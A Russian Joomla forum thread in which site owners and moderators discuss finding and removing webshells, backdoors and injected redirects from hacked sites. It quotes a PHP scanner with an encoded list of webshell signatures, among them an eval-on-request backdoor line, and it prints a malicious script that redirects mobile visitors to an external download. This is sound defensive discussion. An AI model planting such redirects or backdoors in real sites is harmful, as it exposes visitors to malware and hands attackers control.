Новости Joomla

0 Пользователей и 1 Гость просматривают эту тему.
  • 299 Ответов
  • 170480 Просмотров
*

stepan39

  • Захожу иногда
  • 497
  • 27 / 0
Думаю этот же принцип можно применить и к многим другим вирусам.

Разумеется. Только если причину заражения не устраните - будете постоянно пользоваться этой замечательной прогой.
*

genius999

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
программа для чистки - замены и удаления AD Search&Replace качать с сайта разработчика http://www.abroaddesign.com/downloads.html
работает в указанной деректории и проходится по всем файлам 5-15 секунд на движок

Что ищем?
Приведем пример, это часть списка на что обращаем внимание, но у каждого кулцхакера свой почерк, и расширения с файлами тоже свои.
На сегодняшний день ищем заразу вроде
Спойлер
[свернуть]

Вот заразу можно искать автоматически, пока что удалять не получиться (из-за того что иногда коды файлов пересекаются), но найти её можно.

Мы начали разрабатывать расширение для сканирования заразы, в сыром виде оно уже обкатано скоро будет представлено в свет.

Просьба к тем кто находит у себя при чистки заразу Shell и BackDoor пишите в ЛС она нам нужна для расширения библиотеки.

Если кому что интересно тоже пишите в ЛС объясню подробнее.

Сканер сайита или Shell and Backdoor Script Finder


качаем


Положить в корень и вызвать  сайт/fls.php

Сканер сканирует все файлы из-за этого иногда ссылается на файлы сторонних расширений, полной авто замены не получилось пока что сделать, это в будущем. Но  у вас есть возможность видеть ситуацию и все просмотреть. Не слепо не зная что делать, а в нужном направлении.

Чистим сайты от зверей)))
Спойлер
[свернуть]
Похоже что в этом файле который предлагаете скачать вирус base64, может я что-то не то скачал.
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Похоже что в этом файле который предлагаете скачать вирус base64, может я что-то не то скачал.
А как узнал, что вирус? Че то за сегодня, уже второй раз обвиняют сканер в распространении вируса. Как то подозрительно читать.
flyingspook
Может хакеры хотят опорочить сканер ?
*

genius999

  • Осваиваюсь на форуме
  • 12
  • 0 / 0
А как узнал, что вирус? Че то за сегодня, уже второй раз обвиняют сканер в распространении вируса. Как то подозрительно читать.
flyingspook
Может хакеры хотят опорочить сканер ?
Да просто я его открыл Notepadom++ и там чётко написано что это eval(base64_decode), вот привожу код, сам посмотри, есть тема в этом форуме про этот вирус, может сам что-то не то залил:
Цитировать
eval(base64_decode('function scan_directory_recursively($directory, $filter=FALSE)
{
	global $hashes, $strings;
//	$skip_files = array (fls.php);
	
	if(substr($directory,-1) == '/')	{
		$directory = substr($directory,0,-1);
	}

	if(!file_exists($directory) || !is_dir($directory))	{
		return FALSE;
	}elseif(is_readable($directory))	{
		$directory_list = opendir($directory);
		while (FALSE !== ($file = readdir($directory_list))){
			if($file != '.' && $file != '..'){
				$path = $directory.'/'.$file;
				if(is_readable($path))	{
					$subdirectories = explode('/',$path);

					if(is_dir($path)){
						$directory_tree[] = array(
							'path'    => $path,
							'name'    => end($subdirectories),
							'kind'    => 'directory',

							'content' => scan_directory_recursively($path, $filter));

					}elseif(is_file($path))
					{
						$extensiona = explode('.',end($subdirectories));
						$extension = end($extensiona);
						if(($filter === FALSE || $filter == $extension) && $path != __FILE__)
						{
							$directory_tree[] = array(
								'path'      => $path,
								'name'      => end($subdirectories),
								'extension' => $extension,
								'size'      => filesize($path),
								'kind'      => 'file');
						$filehash = hash_file('sha512',$path);
						if (in_array($filehash,$hashes)) {
							if (@$_SERVER['argc'] >= 1) {
								echo "File: $path\n";
								echo "SHA-512 Hash: ";
								echo $filehash;
								echo "\n\n";}
							else
							{
								echo "<p><b>File:</b> $path<br>\n";
								echo "<b>SHA-512 Hash:</b>: ";
								echo $filehash;
								echo "</p>\n\n";
							}
						}
						$file = file_get_contents($path);
						foreach ($strings as $value) {
						$pos = strpos($file,$value);
						if(!($pos === false)){
							if (@$_SERVER['argc'] >= 1) {
								echo "File: $path\n";
								echo "String: ";
								echo $value;
								echo "\n\n";}
							else
							{
								echo "<p><b>File:</b> $path<br>\n";
								echo "<b>String:</b>: ";
								echo $value;
								echo "</p>\n\n";
							}

						}
						}
						}
					}
				}
			}
		}
		closedir($directory_list); 
		return TRUE;
	}else{
		return FALSE;	
	}
}
if (@$_SERVER['argc'] >= 1) 
	echo "Sheel and Basic Backdoor Script Finder\n";
else
	echo "<html>\n<head>\n<meta http-equiv='Content-Type' content='text/html; charset=utf-8'/><title>Basic Backdoor Script Finder</title>\n</head>\n<body>\n\n<p><b>Sheel and Basic Backdoor Script Finder</b></p>\n\n";

			?><p>
		<span style="float:letf;font-size:14px;font-weight:700"><a href="http://site-security.ru/opisanie-raboty-skanera.html">Новая версия сканера</a>
		<br />
			<div class="logo" style="width:480px;float:left;">
				<a href="http://site-security.ru" alt="Logo - www.Site-Security.ru" title="Logo - www.Site-Security.ru">
				<span style="color: #666; font-size: 45px;">Site-</span><span style="color: #FC0; font-size: 45px;">Security<span style="color: #666; font-size: 45px;">.</span>ru</span>
				<img src="http://site-security.ru/images/logo.png" alt="Logo - www.Site-Security.ru>"></a>
			</div>
		<br /><br /><br /><br /></p>
	<?php

if (phpversion() < "5.1.2") {
	echo "You are running version ".phpversion()." of PHP, you need PHP 5.1.2 or above to use this.";
	exit();
}
$hashes = array("31341dcede73378804a3625dfe02cd1c164712c8483e30da8818e1989214220af1bfa773bb26ce1f52bfeb80609bd077c7fa8c4c080b2fc8618e0846b9063c46","d0b3fb5868a28d7421f474b977ff9492d44140db29366e52980c588ef348abb48266cecdaef20754f93f668ba2b92a80689f17e58598370e27804bc0427d2c86","32c5ec613585952721a8aad4ae896605524f3a589c8da2d99af0c47173b06f2be3e66b4374b3a12d348b255d9f99322cb60b07b7eea0a9b211e1ad84227e2084","6a96577dbcb990f636608243b1cb9cf15e935f8b8332ad4d1c6bf1ff4cf39c877eb30cc6d42956afdaaea2fa3136b2e5cba32e27c1ade5a85b8ba08e32801566");

eval(base64_decode('JHN0cmluZ3MgPSBhcnJheSggICAiV2ViIFNoZWxsIGJ5IGJvZmYiLAoJCQkJCSJXZWIgU2hlbGwgYnkgb1JiIiwKCQkJCQkiZGV2aWx6U2hlbGwiLAoJCQkJCSJTaGVsbCBieSBNYXdhcl9IaXRhbSIsCgkJCQkJIk4zdHNoZWxsIiwKCQkJCQkiU3Rvcm03U2hlbGwiLAoJCQkJCSJMb2N1czdTaGVsbCIsCgkJCQkJInByaXZhdGUgU2hlbGwgYnkgbTRyY28iLAoJCQkJCSJ3NGNrMW5nIHNoZWxsIiwKCQkJCQkiRmFUYUxpc1RpQ3pfRnggRngyOVNoIiwKCQkJCQkicjU3c2hlbGwucGhwIiwKCQkJCQkiZGVmYXVsdF9hY3Rpb24gPSAnRmlsZXNNYW4nIiwKCQkJCQkiX3NoZWxsX2F0aWxkaV8iLAoJCQkJCSJ3aWVlZWVlIiwKCQkJCQkiY29va2llbmFtZSA9IFwid2llZWVlZVwiIiwKCQkJCQkifiBTaGVsbCBJIiwKCQkJCQkicGhwaW5mbygpIiwKCQkJCQkiXCRfUE9TVFsncGFzcyddIiwKCQkJCQkiXCRfUE9TVFsiLAoJCQkJCSJcJGRhZW1vbiA9IiwKCQkJCQkiSGFja2VkIEJ5IERldnItaSBNZWZzZWRldCIsCQkJCQkKCQkJCQkiUElSQVRFUyBDUkVXIFdBUyBIRVJFIiwKCQkJCQkiRGFya0Rldmlsei5pTiIsCgkJCQkJIkRldnItaSBNZWZzZWRldCIsCgkJCQkJIlByZXNzIE9LIHRvIGVudGVyIHNpdGUiLAoJCQkJCSJjb25maXJtKCIsCgkJCQkJIjB4ZGQ4MiIsCgkJCQkJInJlYWxhdXRoPVN2QkQ4NWRJTnUzIiwKCQkJCQkib1JiIiwKCQkJCQkiYm9mZiIsCgkJCQkJIkZpbGVzTWFuIiwKCQkJCQkiV2ViLXNoZWxsIiwKCQkJCQkiV0VCIFNIRUxMIiwKCQkJCQkiYzk5c2hlbGwiLAoJCQkJCSJjOTkiLAoJCQkJCSJXZWJTaGVsbCIsCgkJCQkJIkFudGljaGF0IHNoZWxsIiwKCQkJCQkiR3JpbmF5IEdvMG8kRSIsCgkJCQkJIkM5OSBTaGVsbCIsCgkJCQkJIk15U1FMIFdlYnNoZWxsIiwKCQkJCQkiTG9hZGVyJ3ogV0VCIHNoZWxsIiwKCQkJCQkiRml4ZWQgYnkgQXJ0IE9mIEhhY2siLAoJCQkJCSJSNTdTcWwiLAoJCQkJCSJXU08yIFdlYnNoZWxsIiwKCQkJCQkiUFBTIDEuMCBwZXJsLWNnaSB3ZWIgc2hlbGwiLAoJCQkJCSJDR0kgc2hlbGwiLAoJCQkJCSJNeVNRTCBSU1QiLAoJCQkJCSJHSEMgTWFuYWdlciIsCgkJCQkJInJnb2RgcyB3ZWJzaGVsbCIsCgkJCQkJIkpUZXJtIiwKCQkJCQkicjBuaW4iLAoJCQkJCSJtMHJ0aXgiLAoJCQkJCSJwaHBzaGVsbCIsCgkJCQkJIkhBQ0tFRCBCWSBSRUFMV0FSIiwKCQkJCQkiU1NJIFdlYiBzaGVsbCIsCgkJCQkJIkFTUFggU2hlbGwgYnkgTFQiLAoJCQkJCSJXZWJDb250cm9scyIsCgkJCQkJIk5lb0hhY2siLAoJCQkJCSJDaGFydHJldXNlIiwKCQkJCQkiU1NJIHdlYi1zaGVsbCIsCgkJCQkJIlJEb3QiLAoJCQkJCSJ4Q2VkeiIsCgkJCQkJIkJZIGlTS09SUGlUWCIsCgkJCQkJIkFMRU1pTiBLUkFMaSIsCgkJCQkJIk8gQmlSIEtSQUwgVEFLTGlUIEVEaWxFTUVaIiwKCQkJCQkiSGFja2VybGVyIFZ1cnVyIExhbWVybGVyIFN1cnVudXIiLAoJCQkJCSJjMTAwIiwKCQkJCQkibG9jdXM3IiwKCQkJCQkic3Rvcm03IiwKCQkJCQkiZzAwbiIsCgkJCQkJIkNyeXN0YWxTaGVsbCIsCgkJCQkJImFaUmFpTFBoUCIsCgkJCQkJIkJsMG9kM3IiLAoJCQkJCSJFbXBlcm9yIEhhY2tpbmcgVEVBTSIsCgkJCQkJIkR4U2hlbGwiLAoJCQkJCSJHRlMgV2ViLVNoZWxsIiwKCQkJCQkiaDRudHUiLAoJCQkJCSJUaGVfQmVLaVIiLAoJCQkJCSJpTUhhQmlSTGlHaSIsCgkJCQkJIlJvb3RTaGVsbCIsCgkJCQkJIktBX3VTaGVsbCIsCgkJCQkJIkxpejB6aU0iLAoJCQkJCSJNYXRhbXUgTWF0IiwKCQkJCQkiTW9yb2NjYW4gU3BhbWVycyIsCgkJCQkJIk15U2hlbGwiLAoJCQkJCSJNeVNRTCBXZWIgSW50ZXJmYWNlIiwKCQkJCQkiemVyb2ZpbGwiLAoJCQkJCSJQSFAgSFZBIFNoZWxsIFNjcmlwdCIsCgkJCQkJIk5DQyIsCgkJCQkJIk5ldHdvcmtGaWxlTWFuYWdlclBIUCIsCgkJCQkJImlmIChpc3NldChcJF9SRVFVRVNUWydhc2MnXSkpIGV2YWwoc3RyaXBzbGFzaGVzKFwkX1JFUVVFU1RbJ2FzYyddKSk7IiwKCQkJCQkiR29vZzFlX2FuYWxpc3QiLAoJCQkJCSJpZiAoaXNzZXQoXCRfR0VUW1wiY29va2llXCJdKSkgeyBlY2hvICdjb29raWU9Iik7'));

$base = getcwd();

$filestructure = scan_directory_recursively($base, "php");
$filestructure = scan_directory_recursively($base, "html");

if (@$_SERVER['argc'] >= 1) 
	echo "Done\n";
else
	echo "<p><b>Done</b></p>\n</body>\n</html>";'));
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
а то что сканер закодирован чтоб антивирус не ругался ни кто в топиках выше не читал
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Да просто я его открыл Notepadom++ и там чётко написано что это eval(base64_decode), вот привожу код, сам посмотри,
А что смотреть код, я и так знаю.
Почитайте доки по функциям PHP, особо про base64_encode , base64_decode, eval
Вирус может быть в строках, которые передаются как параметр функции base64_decode
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Что за проблема на сайтах kd300.ru   euro.baltart.ru  chestno39.info  ? Почему аваст их банит?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
А что смотреть код, я и так знаю.
Почитайте доки по функциям PHP, особо про base64_encode , base64_decode, eval
Вирус может быть в строках, которые передаются как параметр функции base64_decode
а что же на счет функций preg_replace и assert? не актуально?, а также binary и char?
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Что за проблема на сайтах kd300.ru  ? Почему аваст их банит?
Я же отписал в теме про причину.Яваскрипт с редиректом, при заходе на сайт с мобильного, смартфона,etc.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Да просто я его открыл Notepadom++
и там чётко написано что это eval(base64_decode), вот привожу код, сам посмотри, есть тема в этом форуме про этот вирус, может сам что-то не то залил:



eval(base64_decode) не обезательно является вирусом, это всего лишь преобразует из base64 кодировки в читабельный вид! а затем за счет функции eval выполняет его!
« Последнее редактирование: 09.03.2013, 11:53:27 от flyingspook »
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Нет, ну AVAST достал уже... Он единственный находит какую-то проблему и блокирует мои сайты: chestno39.info, marafon-nevest.ru, euro.baltart.ru и т.д. Причем один и тот же везде Java. Что здесь может быть за редирект? Другие антивирусники не жалуются... Едва ли дело в злоумышленниках Или спит какая-то дрянь в коде?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Нет, ну AVAST достал уже... Он единственный находит какую-то проблему и блокирует мои сайты: chestno39.info, marafon-nevest.ru, euro.baltart.ru и т.д. Причем один и тот же везде Java. Что здесь может быть за редирект? Другие антивирусники не жалуются... Едва ли дело в злоумышленниках Или спит какая-то дрянь в коде?
Увожаемый, а у вас редирект на сайте!

chestno39.info
Цитировать
<script type="text/javascript">
if(navigator.userAgent.match(/(symbos|windows mobile|smartphone|blackberry|ppc|midp|windows ce|mtk|j2me|symbian|series 60|android)/i)!==null)
window.location = "http://fileozon.com/opera_mini/7940/opera_mini.auto"; </script>

и тут тоже marafon-nevest.ru, euro.baltart.ru!

Вообщем занимайтесь чисткой трех сайтов!)
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Причем, если без www - все проходит, а с www - якобы троян. Мистика какая-то (((
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Увожаемый, а у вас редирект на сайте!

chestno39.info
Спасибо! Сейчас попробую удалить. Это в индексе?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Спасибо! Сейчас попробую удалить. Это в индексе?
Да в индиксе, тока и шелы не забудте найти и удалить! явно видно ручная работа а не скрипта автоматического растовляющего редиректы.
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Увожаемый, а у вас редирект на сайте!

chestno39.info
и тут тоже marafon-nevest.ru, euro.baltart.ru!

Вообщем занимайтесь чисткой трех сайтов!)
Вот это спасибо! Вот это толково! Плюс поставил...
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Вот это спасибо! Вот это толково! Плюс поставил...
Да, вот с ше
Да в индиксе, тока и шелы не забудте найти и удалить! явно видно ручная работа а не скрипта автоматического растовляющего редиректы.
Да... вот с шелами заморочка. Как их тут выкопаешь? Сканнер Sheel and Basic Backdoor Script Finder не работает почему-то...
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Вот это толково!
Я в шоке. Еще от 8 марта, я тебе, в твоей же теме, написал что в коде сайта редирект
http://joomlaforum.ru/index.php?PHPSESSID=ff1f1c18e1c1a498a1d82ea542e5e5e2&topic=256925.0
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Да, вот с шеДа... вот с шелами заморочка. Как их тут выкопаешь? Сканнер Sheel and Basic Backdoor Script Finder не работает почему-то...
Может просто ты что то не так делаешь? и этот сканер находит только самые популярные шеллы, если немного изменить структуру шелла то он уже не оприделит, тут лудше ручками искать...
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Я в шоке. Еще от 8 марта, я тебе, в твоей же теме, написал что в коде сайта редирект
http://joomlaforum.ru/index.php?PHPSESSID=ff1f1c18e1c1a498a1d82ea542e5e5e2&topic=256925.0
Да, помню. Спасибо. Просто здесь мне четко обозначили фрагмент кода. Наш программер в отпуске, а я с подобными злостностями пока не сталкивался.
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Может просто ты что то не так делаешь? и этот сканер находит только самые популярные шеллы, если немного изменить структуру шелла то он уже не оприделит, тут лудше ручками искать...
Вот как раз читаю статейку про ручной поиск shell. Думаю, может ну его нафиг... Чем может навредить, если останутся? Проблемы с индексацией или еще что посерьезнее?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Вот как раз читаю статейку про ручной поиск shell. Думаю, может ну его нафиг... Чем может навредить, если останутся? Проблемы с индексацией или еще что посерьезнее?
Хозяин шеллов может повторно установить редиректы, со временем когда домены попадут в банн, вашь сайт будет блокироваться АВ и браузерами, могут повесить доры, связку сплоитов, использовать под спам или развернуть свой пладздарм скриптов, пхп-прокси, вообщем мало чего приятного...
*

baltart

  • Осваиваюсь на форуме
  • 29
  • 0 / 0
Хозяин шеллов может повторно установить редиректы, со временем когда домены попадут в банн, вашь сайт будет блокироваться АВ и браузерами, могут повесить доры, связку сплоитов, использовать под спам или развернуть свой пладздарм скриптов, пхп-прокси, вообщем мало чего приятного...
Стало быть надо ждать выхода программера из отпуска. А то могу на всех блох выловить...
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Стало быть надо ждать выхода программера из отпуска. А то могу на всех блох выловить...
Да, лудше это доверить квалифицированному человеку, если сами не умеите
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу
Просто здесь мне четко обозначили фрагмент кода.
И чем отличается код, который я спрятал под спойлер, от кода в этой теме ?
Поясню- если в сообщении +Показать текстовый блок , то при клике на эту надпись, откроется текст, картинка,etc
Да, вот с шеДа... вот с шелами заморочка. Как их тут выкопаешь? Сканнер Sheel and Basic Backdoor Script Finder не работает почему-то...
Работает, как написано в мане разработчика
http://site-security.ru/nash-pervyj-skaner.html
Запустишь, потом результат работы сканера скопируй и под спойлер.
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
/administrator/includes/includes.php
"PHP File Manager
Enter the password."

Все почистил вроде, а ломают и ломают...
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Все почистил вроде, а ломают и ломают...
значит не все почистили
и обновить все не мешало бы
сам движок, редактор JCE и расширения от nonumber в первую очередь и что у вас еще есть вам виднее
*

SorokinS

  • Захожу иногда
  • 165
  • 12 / 1
Были проблемы через JCE, потом через Advanced Module Manager.

Сейчас вот нашел этот файл.

А так еще есть подозрения на FeedGator. Но его снес везде.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Были проблемы через JCE, потом через Advanced Module Manager.

Сейчас вот нашел этот файл.

А так еще есть подозрения на FeedGator. Но его снес везде.

значит просто не дочистили
shell оболочек могут напихать как сами взломщики, так и потом сторонние боты по их следам, их может быть много и вариации разные только здоровый разум, руки и глаза помогут в их поиске

все началось давно и в ручную, потом начали выполнять это боты, но произошло это из-за самих же пользователей которые начали делиться информацией, что кто нашел, умный "Ваня" не думаю что это кто то из арабов скорей всего наши собратья ну может друзья азиаты, только эти головы могут до такого додуматься, взяли информацию на вооружение, какие файлы и где лежат, пользователи сами рассказали им это и подтолкнули на создание новых ботов, теперь эти боты ходят везде и постоянно просто база пополняется и боты не у одного хозяина их тысячи, вы пишите где и какой файл нашли они мониторят и добавляют в базу своего верного "друга" бота, этот файл где он лежит и команду для выполнения, что то далеко залез уже

во общем как и было с первыми безобидными заменами index.html, а двери ни кто не по удалял и через три года появился "Ваня" нахрена ему думать учить уроки он же из наших лентяев, но с небольшим айкью, вот он и запустил бота по этим дверям, и теперь если вы что либо не дочистите и оставите хоть малейшую щель в заборе, придет другой бот и зальет свое, только вот интересно что свое будет отличаться от того что вы уже почистили, и вам сново придется бесполезные труд совершать, потом еще и дыра появится в каком либо расширении которое усторело, и придет еще более умный бот и сделает инекцию, потом опять боты "Вани", и так по замкнутому кругу

вывод прост надо чистить все и сразу
имхо
если сами не можете не тратьте время обращайтесь к тем кто может, но мое мнение это если за день максимум 2-3 дня не смогли найти на сайте ни чего сами, а многие возятся неделями и даже месяцами, и взлом продолжается и зараза прет, то не проще обратится к тем кто знает и может устранить, посчитайте потраченое время, за это время вы заработаете больше, ну а знаний вы получите именно на ваш случай и не более, в дальнейшем окажется их мало и вы даже с ними про ковыряетесь с такой же проблемой опять столь ко же времени
*

Alex Kop

  • Захожу иногда
  • 111
  • 1 / 0
программа для чистки - замены и удаления AD Search&Replace качать с сайта разработчика http://www.abroaddesign.com/downloads.html
работает в указанной деректории и проходится по всем файлам 5-15 секунд на движок

Что ищем?
Приведем пример, это часть списка на что обращаем внимание, но у каждого кулцхакера свой почерк, и расширения с файлами тоже свои.
На сегодняшний день ищем заразу вроде
Спойлер
[свернуть]

Вот заразу можно искать автоматически, пока что удалять не получиться (из-за того что иногда коды файлов пересекаются), но найти её можно.

Мы начали разрабатывать расширение для сканирования заразы, в сыром виде оно уже обкатано скоро будет представлено в свет.

Просьба к тем кто находит у себя при чистки заразу Shell и BackDoor пишите в ЛС она нам нужна для расширения библиотеки.

Если кому что интересно тоже пишите в ЛС объясню подробнее.

Сканер сайита или Shell and Backdoor Script Finder


качаем


Положить в корень и вызвать  сайт/fls.php

Сканер сканирует все файлы из-за этого иногда ссылается на файлы сторонних расширений, полной авто замены не получилось пока что сделать, это в будущем. Но  у вас есть возможность видеть ситуацию и все просмотреть. Не слепо не зная что делать, а в нужном направлении.

Чистим сайты от зверей)))
Спойлер
[свернуть]
Сканировал этой прогой, вроде ничего не нашла, но я не уверен.
Спойлер
[свернуть]
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 353
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 244164
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 1317
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 486
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 1091
Последний ответ 03.11.2020, 17:36:03
от Cedars